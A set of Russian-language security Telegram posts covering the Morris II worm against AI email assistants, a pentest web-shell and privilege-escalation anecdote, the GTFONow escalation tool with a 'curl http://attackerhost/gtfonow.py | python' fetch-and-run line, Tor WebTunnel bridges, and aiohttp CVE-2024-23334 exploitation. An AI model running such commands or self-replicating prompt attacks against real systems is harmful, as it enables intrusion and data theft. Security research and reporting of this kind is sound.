💻 Нейросетевой червь —
— новая гроза почтовых клиентов с AI-фичами

Группа исследователей из Израильского технологического института и компании Intuit разработали червя Morris II, который заточен на атаки нейросетевых приложений и почтовых клиентов с поддержкой нейросетевых функций. Morris II способен красть личные данные, внедрять вредоносное ПО, спамить пользователей и распространяться через несколько связанных сервисов.

Исследование демонстрирует, что злоумышленники могут использовать запросы (например, в обычном письме), которые при обработке генеративной нейросетью заставляют её воспроизводить входные данные в качестве выходных и совершать вредоносные действия. Червь был протестирован против трёх различных моделей — Gemini Pro, ChatGPT 4.0 и LLaVA, а также оценены различные факторы (например, скорость распространения, репликация, вредоносная активность), влияющие на его эффективность.

В данный момент речь идёт о научном исследовании в искусственно созданной среде, и, по словам авторов, пока нет признаков того, что подобные черви уже действуют в интернете, но это лишь вопрос времени. Команда сообщила о своих результатах в Google и OpenAI.

📎 Подробнее можно почитать тут

@linuxkalii

💻 Держите, дерево всевозможных аттак на Windows

На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою Windows, а иначе для чего это всё
Ну вы понимаете)

@linuxkalii

💻 Инфраструктурный пентест по шагам: сканирование и получение доступа

Годная статья, в которой описываются разные техники повышения привилегий и закрепления в системе.

⏩Например, вот так рассказывается, как получить доступ на запись в папку веб-сервера.
— «На одном из недавних проектов мы обнаружили возможность записывать данные в папку веб-сервера IIS без авторизации. Мы сделали ASPX-файл, загрузили его на сервер и обратились к нему через браузер. Таким образом мы получили возможность исполнять команды в рамках контекста веб-сервера, а он, так же, как MS SQL, имеет привилегию имперсонализации. Мы сделали имперсонализацию и поднялись до системных привилегий. Создали себе учетную запись, зашли на этот веб-сервер через парадную дверь и начали продвигаться по инфраструктуре.»

⏩В целом в статье довольно много полезностей, рекомендую

📎 Статья

@linuxkalii

💻 Новые WebTunnel мосты Tor имитируют HTTPS-трафик

Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.

🗄Напомним, что мосты Tor представляют собой ретрансляторы, не перечисленные в публичном каталоге Tor, которые позволяют маскировать соединения пользователей. Так как уже довольно давно найдены способы обнаружения и блокировки таких соединения (например, в Китае), Tor также использует мосты obfsproxy, которые добавляют дополнительный уровень обфускации.

🗄Как рассказывают разработчики, мосты WebTunnel предназначены для имитации зашифрованного трафика (HTTPS) и основаны на HTTPT. Они оборачивают полезную нагрузку соединения в WebSocket-подобное HTTPS-соединение, которое выглядит как обычный HTTPS (WebSocket).То есть для стороннего наблюдателя это обычное HTTP-соединение, в ходе которого пользователь просто просматривает веб-страницы.

🗄Отмечается, что тестирование WebTunnel началось еще в летом 2023 года. В настоящее время по всему миру работают около 60 мостов WebTunnel, и около 700 активных пользователей ежедневно используют новые мосты на разных платформах. Однако пока WebTunnel работает не во всех регионах, а адрес мостов нужно получать вручную, что планируют доработать в будущем.

@linuxkalii

💻 В этом посте поговорим об инструменте `GTFONow`

Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.

Основные особенности:
🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo.
🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС.
🗄Автоматическая эксплуатация через SSH‑ключи.
🗄Автоматическая эксплуатация через файл используемый в cron.
🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python

🖥 GTFONow

@linuxkalii

😠 Bloodhound - набор аналитических инструментов с открытым исходным кодом (OSINT), предназначенных для отслеживания жертв торговли людьми и различных правонарушителей.

Все инструменты и ссылки бесплатны и постоянно обновляются.

🔗 https://colliertr.github.io/OSINT-dashboard/

#OSINT #OSINT4Good

@linuxkalii

💻 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров

🗄Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

🗄aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

🗄В конце января 2024 года aiohttp обновилась до версии 3.9.2, в которой устранили уязвимость CVE-2024-23334. Это path traversal баг, затрагивающий все версии aiohttp (начиная с 3.9.1) и старше, который позволяет удаленным злоумышленникам без авторизации получить доступ к файлам на уязвимых серверах.

🗄Проблема связана с недостаточной проверкой при установке follow_symlinks в значение True для статичных маршрутов, что позволяет получить несанкционированный доступ к файлам за пределами статичного корневого каталога сервера.

🗄В конце февраля текущего года на GitHub появился PoC-эксплоит для CVE-2024-23334, а в начале марта на YouTube было опубликовано подробное видеоруководство по эксплуатации бага.

🗄Как теперь сообщают аналитики компании Cyble, их сканеры обнаруживают попытки эксплуатации CVE-2024-23334 начиная с 29 февраля, и атаки лишь усилились в марте. В основном попытки сканирования исходят с пяти IP-адресов, один из которых ранее был отмечен в отчете Group-IB и связан с вымогательской группировкой ShadowSyndicate.

@linuxkalii